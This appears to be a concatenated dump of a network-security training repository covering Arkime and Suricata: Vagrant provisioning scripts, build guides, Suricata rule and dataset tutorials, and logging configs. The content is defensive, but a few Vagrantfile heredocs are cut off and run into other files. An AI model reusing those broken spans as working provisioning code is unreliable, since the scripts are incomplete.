adduser vagrant docker 33 | SCRIPT 34 | 35 | $jupyter = <<-SCRIPT 36 | apt-get update && apt-get install python3 python3-pip 37 | su - vagrant -c "pip3 install --upgrade --user jupyter jupyterlab" 38 | SCRIPT 39 | 40 | Vagrant.configure(2) do |config| 41 | config.vm.define 'moloch-build' do |box| 42 | box.vm.box = "ubuntu/bionic64" 43 | box.vm.hostname = 'moloch-build' 44 | box.vm.network :private_network, ip: "192.168.56.12" 45 | box.vm.provider :hyperv do |hv, override| 46 | hv.cpus = 4 47 | hv.maxmemory = 4096 48 | override.vm.box = "generic/ubuntu1804" 49 | #override.vm.synced_folder ".", "/vagrant", type: "smb" 50 | end 51 | box.vm.provider :virtualbox do |vb| 52 | vb.customize ["modifyvm", :id, "--memory", "4096"] 53 | vb.customize ["modifyvm", :id, "--cpus", "4"] 54 | end 55 | #config.vm.provision "shell", inline: $script 56 | config.vm.provision "shell", inline: $docker 57 | config.vm.provision "shell", inline: $moloch 58 | end 59 | end 60 | -------------------------------------------------------------------------------- /Arkime/setup/build-freebsd.md: -------------------------------------------------------------------------------- 1 | # Building Moloch from source 2 | 3 | see 4 | * https://github.com/aol/moloch#building-and-installing 5 | * https://github.com/aol/moloch/wiki/Settings#Basic_Settings 6 | * https://nodejs.org/en/download/package-manager/ 7 | 8 | 9 | Install dependencies. 10 | 11 | ``` 12 | pkg install openjdk8 elasticsearch6 node8 lua53 wget curl pcre flex bison 13 | pkg install gettext e2fsprogs-libuuid glib gmake p5-JSON 14 | ``` 15 | 16 | Set up ES java heap size. 17 | 18 | ``` 19 | vmstat 20 | vim /usr/local/etc/elasticsearch/jvm.options 21 | ``` 22 | 23 | Rule of thumb is 50 per cent of all system memory but no more than 31(ish) gigabytes. It's okay to use less for testing environment that also houses moloch capture, viewer, wise, etc. 24 | 25 | ``` 26 | -Xms512m 27 | -Xmx512m 28 | ``` 29 | 30 | Start ES service 31 | 32 | ``` 33 | sysrc elasticsearch_enable=YES 34 | service elasticsearch start 35 | ``` 36 | 37 | ``` 38 | curl -ss -XGET 127.0.0.1:9200/_cat/nodes 39 | ``` 40 | 41 | ## Moloch 42 | 43 | ### Nodejs 44 | 45 | Dependency for viewer. Node 8.9 is required for Moloch 1.0.0 and beyond, 6.13 for 0.50 and older. 46 | 47 | * https://nodejs.org/dist/ 48 | 49 | ### get the source 50 | ``` 51 | git clone https://github.com/aol/moloch 52 | cd moloch 53 | git checkout -b 'v1.1.0' 54 | ``` 55 | 56 | ### configure, make install 57 | 58 | * PS! Check the filesystem paths. Chosen `/opt/moloch` is arbitrary choice of the instructor and may not reflect your environment. Vagrant build machine will use non-privileged directory in user home directory. 59 | 60 | ``` 61 | ./easybutton-build.sh -d /opt/moloch 62 | sudo gmake install 63 | ``` 64 | 65 | ### Basic configuration 66 | 67 | Download geoIP databases. 68 | 69 | ``` 70 | cd /opt/moloch/bin 71 | cat ./moloch_update_geo.sh 72 | ``` 73 | 74 | Create unprivileged user 75 | 76 | ``` 77 | pw group add moloch 78 | pw user add moloch -g moloch -s /usr/bin/false 79 | ``` 80 | 81 | Create PCAP storage directory. 
Set permissions 82 | 83 | ``` 84 | mkdir /srv/pcap 85 | chown -R moloch:moloch /srv/pcap 86 | usermod -d /srv/pcap moloch 87 | ``` 88 | 89 | ``` 90 | cd /opt/moloch/etc 91 | cp config.ini.sample config.ini 92 | vim config.ini 93 | ``` 94 | 95 | * Point moloch to ES HTTP proxy(s) 96 | * Set capture interface 97 | * PCAP storage directory 98 | * geoIP, ASN, RIR database locations 99 | * unprivileged user/group 100 | 101 | Create moloch database 102 | 103 | ``` 104 | cd /opt/moloch/db 105 | ./db.pl --help 106 | ``` 107 | 108 | Start moloch-capture 109 | 110 | ``` 111 | /opt/moloch/bin/moloch-capture --help 112 | ``` 113 | 114 | Create user for viewer 115 | 116 | ``` 117 | cd /opt/moloch/viewer 118 | nodejs addUser.js -c /opt/moloch/etc/config.ini 119 | ``` 120 | 121 | Start viewer 122 | 123 | ``` 124 | nodejs viewer.js -c /opt/moloch/etc/config.ini 125 | ``` 126 | 127 | ### testing capture without viewer 128 | 129 | ``` 130 | curl 127.0.0.1:9200/_cat/indices 131 | ``` 132 | 133 | * expect to see index `sessions2-YYMMDD` 134 | * problem with capture if missing, please read capture console logs carefully 135 | * if present, check if you actually have messages in the index 136 | 137 | ``` 138 | curl 127.0.0.1:9200/sessions2-YYMMDD/_search?pretty 139 | ``` 140 | ``` 141 | ls -lah /srv/pcap 142 | tcpdump -r *.pcap -c1 143 | curl -ss -XGET 127.0.0.1:9200/_cat/indices 144 | curl -ss -XGET 127.0.0.1:9200/sessions-*/_search?pretty -d '{"size":1}' 145 | ``` 146 | 147 | ### Finally, ... 148 | 149 | * pushing to background (&, nohup, stdout/stderr) 150 | * rc 151 | * data retention 152 | 153 | --- 154 | [next : Advanced Configuration](/Arkime/config.md) 155 | -------------------------------------------------------------------------------- /Arkime/suricata/README.md: -------------------------------------------------------------------------------- 1 | # Integrating Suricata with Arkime 2 | 3 | Arkime has a plugin for Suricata which enables enriching sessions with Suricata alerts. This allows for filtering sessions which have triggered a Suricata alert. 4 | 5 | Requirements for the plugin to work: 6 | 7 | * Suricata and Arkime Capture must see the same traffic. 8 | * Arkime must be able to access the eve.json log from Suricata. 9 | * Arkime will try match sessions based on the 5-tuple from the eve.json file. 10 | * Only events with the event type of `alert` are considered. 11 | 12 | Expected outcome 13 | 14 | * This plugin adds new fields to Arkime (similarly to like wise and tagger). 15 | * Sessions that have been enriched will have several new fields, all starting with the `suricata` prefix. 16 | * There will be a separate `Suricata` sub-section in the Arkime sessions view. 17 | * A query to find all sessions that have Suricata data is `suricata.signature == EXISTS!`. 18 | 19 | 20 | ## Configure Arkime 21 | 22 | Append `suricata.so` to your `config.ini` plugins line 23 | 24 | ``` 25 | plugins=wise.so;suricata.so 26 | ``` 27 | 28 | `suricataAlertFile` should be the full path to your eve.json file. `suricataExpireMinutes` option specifies how long Arkime will keep trying to match past suricata events. Note: When processing old PCAPs you need to compensate for the time from `now() - pcap-record-date`. 29 | 30 | ``` 31 | suricataAlertFile=/var/log/suricata/eve.json 32 | suricataExpireMinutes=60 33 | ``` 34 | 35 | ## Install and (minimally) configure Suricata 36 | 37 | Naturally you will also need Suricata. If it's not already installed, you need to install it. 
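A quick way to check whether a usable build is already present before installing anything (a small sketch, assuming `suricata` would already be on `PATH` if installed):

```
suricata -V
suricata --build-info | head
```

If the command is missing or the version is very old, install or upgrade it as described below.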
38 | 39 | For Ubuntu there's a [PPA for Suricata](https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Ubuntu_Installation_-_Personal_Package_Archives_%28PPA%29), so that's the most convenient way of installing the latest stable version of Suricata. 40 | 41 | ``` 42 | apt-get install software-properties-common 43 | add-apt-repository ppa:oisf/suricata-stable 44 | apt-get update 45 | apt-get install suricata 46 | ``` 47 | 48 | That's it! Suricata is installed. However let's check the Suricata log file `/var/log/suricata/suricata.log`. 49 | 50 | ``` 51 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Unable to find iface eth0: No such device 52 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Couldn't init AF_PACKET socket, fatal error 53 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_FATAL(171)] - thread W#01-eth0 failed 54 | ``` 55 | 56 | We need to modify `/etc/suricata/suricata.yaml` file to point Suricata to the correct network interface 57 | 58 | ``` 59 | # Linux high speed capture support 60 | af-packet: 61 | - interface: enp11s0 62 | ``` 63 | 64 | Restart the Suricata systemd service and check the logs again. 65 | 66 | ``` 67 | systemctl restart suricata.service 68 | less /var/log/suricata/suricata.log 69 | ``` 70 | 71 | The errors for the interface should be gone now. However check if and how many Suricata rules/signratures were loaded? 72 | 73 | ``` 74 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_NO_RULES(42)] - No rule files match the pattern /var/lib/suricata/rules/suricata.rules 75 | 13/6/2023 -- 19:36:20 - - No rules loaded from suricata.rules. 76 | 13/6/2023 -- 19:36:20 - - [ERRCODE: SC_ERR_NO_RULES_LOADED(43)] - 1 rule files specified, but no rules were loaded! 77 | ``` 78 | 79 | Suricata has a Rule management tool called `suricata-update`. 80 | 81 | ``` 82 | # see various options 83 | suricata-update --help 84 | # Fetch ET Open ruleset for Suricata 85 | suricata-update --etopen 86 | ``` 87 | 88 | You should see something like 89 | 90 | ``` 91 | 13/6/2023 -- 19:52:30 - -- Writing rules to /var/lib/suricata/rules/suricata.rules: total: 42944; enabled: 34152; added: 42944; removed 0; modified: 0 92 | ``` 93 | 94 | Once again, restart the Suricata service to make sure the new rules are loaded. 95 | 96 | ``` 97 | systemctl restart suricata.service 98 | less /var/log/suricata/suricata.log 99 | ``` 100 | 101 | ``` 102 | 13/6/2023 -- 20:28:54 - - Loading rule file: /var/lib/suricata/rules/suricata.rules 103 | 13/6/2023 -- 20:29:02 - - 1 rule files processed. 34152 rules successfully loaded, 0 rules failed 104 | 13/6/2023 -- 20:29:02 - - Threshold config parsed: 0 rule(s) found 105 | 13/6/2023 -- 20:29:02 - - 34155 signatures processed. 1277 are IP-only rules, 5214 are inspecting packet payload, 27457 inspect application layer, 108 are decoder event only 106 | ``` 107 | 108 | ## Checking the results 109 | 110 | Now that Suricata is installed and running, we can restart our Arkime Capture and Viewer, so that our earlier changes will take effect. Arkime Capture will load the Suricata module and start parsing the eve.json file. 111 | 112 | ``` 113 | systemctl restart arkimecapture.service 114 | systemctl restart arkimeviewer.service 115 | ``` 116 | 117 | We need some traffic that would fire off a Suricata alert. 118 | 119 | ``` 120 | curl -s http://www.testmyids.com 121 | ``` 122 | 123 | Wait for the session to get indexed and see the results from Arkime Viewer. 
You can use the filter `suricata.signature == EXISTS!` for finding sessions with Suricata matches. 124 | 125 | -------------------------------------------------------------------------------- /Arkime/tuning/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | $script = <<-SCRIPT 5 | systemctl stop systemd-resolved.service 6 | echo "nameserver 1.1.1.1" > /etc/resolv.conf 7 | SCRIPT 8 | 9 | $docker = <<-SCRIPT 10 | export DEBIAN_FRONTEND=noninteractive 11 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 12 | apt-get -qq -y install \ 13 | apt-transport-https \ 14 | ca-certificates \ 15 | curl \ 16 | gnupg-agent \ 17 | software-properties-common 18 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 19 | add-apt-repository \ 20 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 21 | $(lsb_release -cs) \ 22 | stable" 23 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 24 | systemctl enable docker.service 25 | systemctl start docker.service 26 | adduser vagrant docker 27 | SCRIPT 28 | 29 | $jupyter = <<-SCRIPT 30 | apt-get update && apt-get install -y python3 python3-pip 31 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch" 32 | su - vagrant -c "mkdir ~/.jupyter" 33 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < /etc/resolv.conf 7 | SCRIPT 8 | 9 | $docker = <<-SCRIPT 10 | export DEBIAN_FRONTEND=noninteractive 11 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 12 | apt-get -qq -y install \ 13 | apt-transport-https \ 14 | ca-certificates \ 15 | curl \ 16 | gnupg-agent \ 17 | software-properties-common 18 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 19 | add-apt-repository \ 20 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 21 | $(lsb_release -cs) \ 22 | stable" 23 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 24 | systemctl enable docker.service 25 | systemctl start docker.service 26 | adduser vagrant docker 27 | SCRIPT 28 | 29 | $jupyter = <<-SCRIPT 30 | apt-get update && apt-get install -y python3 python3-pip 31 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch" 32 | su - vagrant -c "mkdir ~/.jupyter" 33 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < Suricata is a free and open source, mature, fast and robust network threat detection engine. The Suricata engine is capable of real time intrusion detection (IDS), inline intrusion prevention (IPS), network security monitoring (NSM) and offline pcap processing. 
11 | 12 | # Suricata 13 | 14 | ## Day 0: Intro - Mon, Oct 17, *starts at 11:00* 15 | 16 | * 11:00 - 12:30 17 | * [Intro](/common/day_intro.md) 18 | * [singlehost](/singlehost) 19 | * [vagrant](/Suricata/vagrant) 20 | * [what is Suricata](/Suricata/intro) 21 | * 13:30 - 16:30 22 | * [Suricata on CLI](/Suricata/intro) 23 | * [Suricata language server](https://www.stamus-networks.com/blog/suricata-language-server) 24 | * [writing your first rule](/Suricata/intro#writing-your-first-rule) 25 | 26 | ## Day 1 - Tue, Oct 18, 08:30 27 | * 08:30 - 12:30 28 | * [EVE log basics](/Suricata/eve) 29 | * [EVE basic tasks](/Suricata/eve#tasks) 30 | * [rule writing, cont](/Suricata/rules) 31 | * 13:30 - 16:30 32 | * [Unix socket mode](/Suricata/unix-socket) 33 | * [datasets](/Suricata/datasets) 34 | 35 | ## Day 2 - Wed, Oct 19, 08:30 36 | * 08:30 - 12:30 37 | * [datasets, cont](/Suricata/datasets) 38 | * [building suricata](/Suricata/build) 39 | * 13:30 - 16:30 40 | * [configuring suricata](/Suricata/config) 41 | 42 | ## Day 3 - Thu, Oct 20, 08:30 43 | * 08:30 - 12:30 44 | * [Introducing rulesets](/Suricata/rulesets) 45 | * [Ruleset exploration show and tell](/Suricata/rulesets#show-and-tell) 46 | * [suricata-update](/Suricata/suricata-update) 47 | * 13:30 - 16:30 48 | * [SELKS](/Suricata/selks) 49 | * [Hunting notebooks](/Suricata/selks#suricata-analytics) 50 | 51 | ## Day +1: Last but not least - Fri, Oct 21, 08:30 52 | * 08:30 - 10:00 53 | * [open for requests](/Suricata) 54 | * 10:30 - 11:30 55 | * [feedback, contact exchange, thanks, etc.](/common/Closing.md) 56 | 57 | ### Before You Come To Class please browse trough .. 58 | 59 | * [prereqs](https://github.com/ccdcoe/CDMCS/tree/master/prerequisites) 60 | * [singlehost](https://github.com/ccdcoe/CDMCS/tree/master/singlehost) 61 | * [suricata](https://suricata.readthedocs.io/en/latest/) 62 | * [vagrant](https://github.com/ccdcoe/CDMCS/tree/master/common/vagrant) 63 | -------------------------------------------------------------------------------- /Suricata/build/hyperscan.md: -------------------------------------------------------------------------------- 1 | # Building hyperscan 2 | 3 | **Only do this if you build Suricata for performance on a platform that does not provide hyperscan binary packages. Building it will take long time and will melt your laptop! This section is only for reference!** 4 | 5 | * https://01.org/hyperscan 6 | * https://github.com/intel/hyperscan 7 | 8 | In addition to prior build tools, install cmake and friends. 9 | 10 | ``` 11 | apt-get install -y cmake ragel libboost-all-dev sqlite3 12 | ``` 13 | 14 | Grab the source. 15 | 16 | ``` 17 | git clone https://github.com/intel/hyperscan /home/vagrant/hyperscan-build 18 | cd /home/vagrant/hyperscan-build 19 | git checkout $VERSION 20 | ``` 21 | 22 | Build locally using cmake. 23 | 24 | ``` 25 | cmake -DCMAKE_INSTALL_PREFIX=/home/vagrant/Libraries -DCMAKE_INSTALL_LIBDIR=lib -DBUILD_STATIC_AND_SHARED=1 26 | ``` 27 | 28 | Then compile and install. Parallelize to whatever number of CPU threads you have and go grab a coffee. This may take a while. 29 | 30 | ``` 31 | make -j4 && make install 32 | ``` 33 | 34 | If on laptop, put it down for health and safety and make sure it is not on battery power. 
35 | 36 | ``` 37 | coretemp-isa-0000 38 | Adapter: ISA adapter 39 | Package id 0: +100.0°C (high = +84.0°C, crit = +100.0°C) 40 | Core 0: +96.0°C (high = +84.0°C, crit = +100.0°C) 41 | Core 1: +100.0°C (high = +84.0°C, crit = +100.0°C) 42 | Core 2: +99.0°C (high = +84.0°C, crit = +100.0°C) 43 | Core 3: +92.0°C (high = +84.0°C, crit = +100.0°C) 44 | 45 | acpitz-acpi-0 46 | Adapter: ACPI interface 47 | temp1: +98.0°C (crit = +200.0°C) 48 | 49 | thinkpad-isa-0000 50 | Adapter: ISA adapter 51 | fan1: 3478 RPM 52 | ``` 53 | 54 | Finally, configure suricata with hyperscan library directories. See `cmake` flags in prior commands. 55 | 56 | ``` 57 | cd 58 | ./configure --prefix= --with-libhs-includes=/home/vagrant/Libraries/include/hs --with-libhs-libraries=/home/vagrant/Libraries/lib 59 | ``` 60 | 61 | Note that suricata may not start up with this config, as system runtime is unaware of custom shared library directory. 62 | 63 | -------------------------------------------------------------------------------- /Suricata/build/intro.md: -------------------------------------------------------------------------------- 1 | # Intro 2 | 3 | ## Why 4 | 5 | * So, why build if we can install? 6 | * Each env in different, each org has its own policies and setup; 7 | * Goal is to understand how Suricata is set up, what goes in; 8 | * must understand when debugging; 9 | * for analysts: garbage in -> garbage out; 10 | * even if you won't build your own, you need to understand input; 11 | * you don't see something, could be packet loss, overloaded rule, missing features; 12 | * you need to explain WHY you did not find the bad thing; 13 | * you need to propose how to debug rulesets, configs, etc; 14 | * might not be able to do that without custom builds; 15 | * remember, one rule can kill your performance; 16 | * custom build in prod; 17 | * could be prohibited by policy; 18 | * that's backward thinking (for OSS); 19 | * custom build == code audit == protect against supply chain attack; 20 | * one big central IDS is pretty common, needs to optimize; 21 | * Why NOT to run custom build in prod; 22 | * policy prohibits, no resources to audit code; 23 | * many probes, distributed, needs deploy system and central management; 24 | -------------------------------------------------------------------------------- /Suricata/data-exploration/999-tasks.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Tasks\n", 8 | "\n", 9 | "* Parse eve.json from singlehost as presented in `001-load-eve`, collect unique SID values for frequent alerts;\n", 10 | " * Use these values to generate `disable.conf` for `suricata-update`;" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": null, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [] 19 | } 20 | ], 21 | "metadata": { 22 | "kernelspec": { 23 | "display_name": "Python 3", 24 | "language": "python", 25 | "name": "python3" 26 | }, 27 | "language_info": { 28 | "codemirror_mode": { 29 | "name": "ipython", 30 | "version": 3 31 | }, 32 | "file_extension": ".py", 33 | "mimetype": "text/x-python", 34 | "name": "python", 35 | "nbconvert_exporter": "python", 36 | "pygments_lexer": "ipython3", 37 | "version": "3.8.1" 38 | } 39 | }, 40 | "nbformat": 4, 41 | "nbformat_minor": 4 42 | } 43 | -------------------------------------------------------------------------------- /Suricata/datasets/README.md: 
-------------------------------------------------------------------------------- 1 | # Datasets 2 | 3 | * https://suricata.readthedocs.io/en/latest/rules/datasets.html 4 | 5 | IDS rules have historically been rather static and self-contained entities. Threat detection, however, requires us to be dynamic and flexible. Consider [sslbl ja3 blacklist](https://sslbl.abuse.ch/blacklist/ja3_fingerprints.rules) as an example. Each black or whitelisted hash needs to be separate rule with distinct ID. We could use PCRE with alternation, but that would kill our IDS performance. Best way to get around this limitation has been to generate those rules. While there is nothing wrong with this approach, it is still a hack around design limitations. Furthermore, entire ruleset needs to be reloaded if entries are added or removed from this list. 6 | 7 | `Datasets` is a new (ish) feature for eliminating this limitation. Any sticky buffer can be hooked to a list of base64 strings, md5, or sha256 hashes. `Datarep` is the same thing, but each entry can also be assigned a score. You can then define a threshold inside a rule, so it would trigger if reputation is above or below a numeric value. 8 | 9 | ## Basic usage with Suricata 5.0.x 10 | 11 | `Dataset` can be created in `suricata.yaml` and then invoked in a rule. 12 | 13 | ``` 14 | datasets: 15 | defaults: 16 | memcap: 10mb 17 | hashsize: 1024 18 | ua-sha256: 19 | type: sha256 20 | state: /var/lib/suricata/useragents-sha256.lst 21 | ``` 22 | 23 | ``` 24 | alert http any any -> any any (msg:"HTTP user-agent list"; http.user_agent; to_sha256; dataset:isset,ua-sha256; sid:123; rev:1;) 25 | ``` 26 | 27 | Alternatively, the rule could be rewritten to contain all needed parameters. Modifying `suricata.yaml` would not be needed in that case. 28 | 29 | ``` 30 | alert http any any -> any any (msg:"HTTP user-agent list"; http.user_agent; to_sha256; dataset:isset,ua-sha256,type sha256, state /vagrant/seen-dns.lst; sid:123; rev:1;) 31 | ``` 32 | 33 | ## Basic usage with Suricata 6.0.x 34 | 35 | All parameters can be set in the signature 36 | 37 | ``` 38 | alert http any any -> any any (msg:"HTTP user-agent list"; http.user_agent; to_sha256; dataset:isset,ua-sha256,type sha256, state /vagrant/seen-dns.lst, memcap 10mb, hashsize 1024; sid:123; rev:1;) 39 | ``` 40 | 41 | ## Live update 42 | 43 | Here is the important section. 44 | 45 | ``` 46 | dataset:isset,ua-sha256,type sha256, state /vagrant/seen-dns.lst 47 | ``` 48 | 49 | Note that rule starts with `isset` to verify existence of list element. You could also use `isnotset` to check for element to be absent and `set` to add a missing element to the list. Items can be added to the set manually via `dataset-add` unix socket command. 50 | 51 | ## Dataset rule 52 | 53 | Suppose we have a list of spambot mail servers from threat intel feed, stored in some plaintext file. For example in `/tmp/mailservers.lst`. Good PCAP to test it is [here](https://malware-traffic-analysis.net/2020/12/07/index.html). We can write a following rule that on its own does not do much. 
54 | 55 | ``` 56 | alert dns any any -> any any (msg:"Spambot mailservers seen"; dns.query; dataset:isset,spambots, type string, state /tmp/mailservers.lst, memcap 10mb, hashsize 10000; sid:123; rev:1;) 57 | ``` 58 | 59 | Note that: 60 | * Name of the dataset is `spambots`; 61 | * Dataset file location is `/tmp/mailservers.lst`; 62 | * We are limiting the memory usage and hashtable size of this set to 10MB and 10000 elements respectively; 63 | * The rule produces a new alert whenever someone does a DNS query for a domain that we have labeled as spambot; 64 | 65 | ## Adding elements 66 | 67 | Adding an element, such as `mail.militaryrelocator.com`, to this list requires us to base64 encode it when using the `string` datatype. 68 | 69 | ``` 70 | echo -n mail.militaryrelocator.com | base64 71 | ``` 72 | 73 | Using the `sha256` datatype requires hashing the added value instead. 74 | 75 | ``` 76 | echo -n mail.militaryrelocator.com | sha256sum 77 | ``` 78 | 79 | Note that calling plain `echo` would implicitly add a newline symbol to the string. While barely visible to the human eye, it's nothing more than an extra character to the computer. No different from any other letter. And that would affect the base64 value of the string. Suricata does not add this newline, so the base64 values would differ. We use `echo -n` to avoid this issue. 80 | 81 | We could append the output of this command directly to `/tmp/mailservers.lst` and then start Suricata. Or we could start Suricata (for example in unix-socket mode if working on offline PCAPs) and use the `dataset-add` command to insert the element. 82 | 83 | ``` 84 | ./bin/suricatasc -c "dataset-add spambots string $(echo -n mail.militaryrelocator.com | base64)" 85 | ``` 86 | 87 | **Suricata must be shut down for it to store newly added datasets on disk!** Once you have done this, you can verify that the added element is in the persistence file. 88 | 89 | ``` 90 | grep `echo -n mail.militaryrelocator.com | base64` /tmp/mailservers.lst 91 | ``` 92 | 93 | With a little scripting, you can easily add a lot of elements to that set. 94 | 95 | ``` 96 | cat mailservers.txt | while read line ; do ./bin/suricatasc -c "dataset-add spambots string $(echo -n $line | base64)" ; done 97 | ``` 98 | 99 | ## Setting new values in rules 100 | 101 | Alternatively, we could simply generate a list of unique mail servers with the following rule. Note that we are using the `set` keyword to add new elements to the hash table, whereas before we were using `isset` to check for element existence. 102 | 103 | ``` 104 | alert dns any any -> any any (msg:"New mailserver query seen"; dns.query; content: "mail"; startswith; dataset:set,new-mailservers, type string, state /tmp/new-mailservers.lst, memcap 10mb, hashsize 10000; sid:123; rev:1;) 105 | ``` 106 | 107 | ## IP dataset in Suricata 7.x 108 | 109 | The initial implementation of datasets only supported sticky buffers, which are part of the rule options. This meant IP addresses could not be checked with a dataset, since IP matching is part of the rule header. This has been fixed in Suricata 7, as sticky buffers for IP matching are now available. 110 | 111 | * https://docs.suricata.io/en/suricata-7.0.5/rules/ipaddr.html#ip-addresses-match 112 | 113 | ``` 114 | alert ip [$HOME_NET] any -> any any (msg:"Bad IP seen 124"; sid: ; rev: 1; ip.dst; dataset:isset,bad-ip,type ip, load bad-ip.lst, hashsize 10000;) 115 | ``` 116 | 117 | Unlike the string type, IP addresses do not have to be base64 encoded. 118 | 119 | ## Tasks 120 | 121 | Use PCAP files specified by the instructors.
122 | 123 | * Write one single rule detecting default user-agents (exact matches on lowercase strings are fine); 124 | * Python; 125 | * Nikto; 126 | * Dirbuster; 127 | * Nmap; 128 | * Curl 129 | * Create a `string` list of all unique **dns queries**, **http user-agents**, **http.uri**, **ja3 fingerprints** and **TLS certificate issuers**; 130 | * lists should be generated **without getting any alerts**; 131 | * Verify each list element with `base64 -d`; 132 | * From those lists, select some interesting values and add them to new dataset; 133 | * Ensure that you get alerts when those elements are observed in PCAP or on wire; 134 | * Write a script that generates a dataset called `ad-domain-blacklist` from [this hosts file](https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts); 135 | * Enhance the prior solution to also add reputation value for each entry; 136 | -------------------------------------------------------------------------------- /Suricata/docker/dalton/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | export debian_frontend=noninteractive 4 | export port=8089 5 | 6 | bash stop.sh 7 | 8 | echo "provisioning dalton" 9 | [[ -d dalton ]] || git clone https://github.com/secureworks/dalton.git 10 | cd dalton && grep $port .env || sed -i "s/DALTON_EXTERNAL_PORT=80/DALTON_EXTERNAL_PORT=$port/g" .env 11 | 12 | if [ -f "/etc/arch-release" ]; then 13 | sudo bash -c "time docker-compose build && docker-compose up -d" 14 | else 15 | time docker-compose build && docker-compose up -d 16 | fi 17 | -------------------------------------------------------------------------------- /Suricata/docker/dalton/stop.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | echo "stopping dalton" 4 | [[ -d dalton ]] || exit 1 5 | cd dalton 6 | 7 | if [ -f "/etc/arch-release" ]; then 8 | sudo bash -c "docker-compose stop && docker-compose rm -f" 9 | else 10 | time docker-compose stop && docker-compose rm -f 11 | fi 12 | 13 | -------------------------------------------------------------------------------- /Suricata/docker/redisLogging/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.2' 2 | services: 3 | elasticsearch: 4 | image: docker.elastic.co/elasticsearch/elasticsearch-oss:6.1.2 5 | container_name: elasticsearch 6 | ports: 7 | - "9200:9200" 8 | #- "9300:9300" 9 | environment: 10 | #- cluster.name=docker-cluster 11 | - "ES_JAVA_OPTS=-Xmx1g -Xms1g" 12 | ulimits: 13 | memlock: 14 | soft: -1 15 | hard: -1 16 | # volumes: 17 | # - type: bind 18 | # source: /srv/pcap/elasticsearch 19 | # target: /usr/share/elasticsearch/data 20 | kibana: 21 | image: docker.elastic.co/kibana/kibana-oss:6.1.2 22 | container_name: kibana 23 | ports: 24 | - "5601:5601" 25 | depends_on: 26 | - elasticsearch 27 | logstash: 28 | image: docker.elastic.co/logstash/logstash-oss:6.1.2 29 | container_name: logstash 30 | depends_on: 31 | - elasticsearch 32 | volumes: 33 | - ./logstash-redis-ela.conf:/usr/share/logstash/pipeline/logstash.conf 34 | redis: 35 | image: redis 36 | container_name: redis 37 | ports: 38 | - "6379:6379" 39 | -------------------------------------------------------------------------------- /Suricata/docker/redisLogging/logstash-redis-ela.conf: -------------------------------------------------------------------------------- 1 | input { 2 | redis { 3 | data_type => "list" 4 | host => "redis" 5 | port => 6379 
6 | key => "suricata" 7 | tags => ["suricata", "CDMCS", "fromredis"] 8 | } 9 | } 10 | filter { 11 | json { 12 | source => "message" 13 | } 14 | if 'syslog' not in [tags] { 15 | mutate { remove_field => [ "message", "Hostname" ] } 16 | } 17 | } 18 | output { 19 | elasticsearch { 20 | hosts => ["elasticsearch"] 21 | index => "suricata-%{+YYYY.MM.dd}" 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Suricata/ebpf/README.md: -------------------------------------------------------------------------------- 1 | # eBPF and XDP 2 | 3 | See 4 | * Documentation: https://suricata.readthedocs.io/en/latest/capture-hardware/ebpf-xdp.html 5 | * Talk on Suricata, XDP and eBPF: https://home.regit.org/~regit/suricata-ebpf.pdf 6 | * BPF cli wrapper: https://github.com/StamusNetworks/bpfctrl.git 7 | 8 | **Vagrant env has most libraries and tools in the `/data` folder.** Please use the `root` user for the duration of this exercise. Many things may otherwise be installed locally for the regular user, and debugging those issues is not the purpose of this exercise. 9 | 10 | **Commands in this README serve an illustrative purpose**. Please follow the official Suricata documentation for an up-to-date reference. 11 | 12 | ## Building an eBPF enabled Suricata 13 | 14 | Suricata uses libbpf to interact with eBPF. The library is available at https://github.com/libbpf/libbpf 15 | and is already cloned in the libbpf directory inside the `/data` directory. Build it from 16 | the `src` directory with a traditional 17 | 18 | ``` 19 | make 20 | make install 21 | ``` 22 | 23 | To enable eBPF support you need to pass a series of flags to suricata configure: 24 | 25 | ``` 26 | ./configure --enable-ebpf --enable-ebpf-build CC=clang-6.0 27 | ``` 28 | 29 | You can then build and install the software 30 | 31 | ``` 32 | make -j4 33 | make install 34 | make install-conf 35 | ``` 36 | 37 | ## Setup 38 | 39 | ### System 40 | To use pinned maps, you first have to mount the `bpf` pseudo filesystem: 41 | 42 | ``` 43 | sudo mount -t bpf none /sys/fs/bpf 44 | ``` 45 | 46 | ### Suricata 47 | 48 | The af-packet section of the Suricata configuration file needs to be updated to point to the eBPF filter 49 | and to activate pinned maps: 50 | 51 | ``` 52 | af-packet: 53 | - interface: enp0s8 54 | ebpf-filter-file: /home/vagrant/suricata/ebpf/filter.bpf 55 | pinned-maps: true 56 | ``` 57 | 58 | By pointing directly to the eBPF filter in the source tree we will be able to update it easily later. 59 | 60 | ### CLI tooling 61 | 62 | See the [bpfctrl git page](https://github.com/StamusNetworks/bpfctrl.git) for setup instructions. 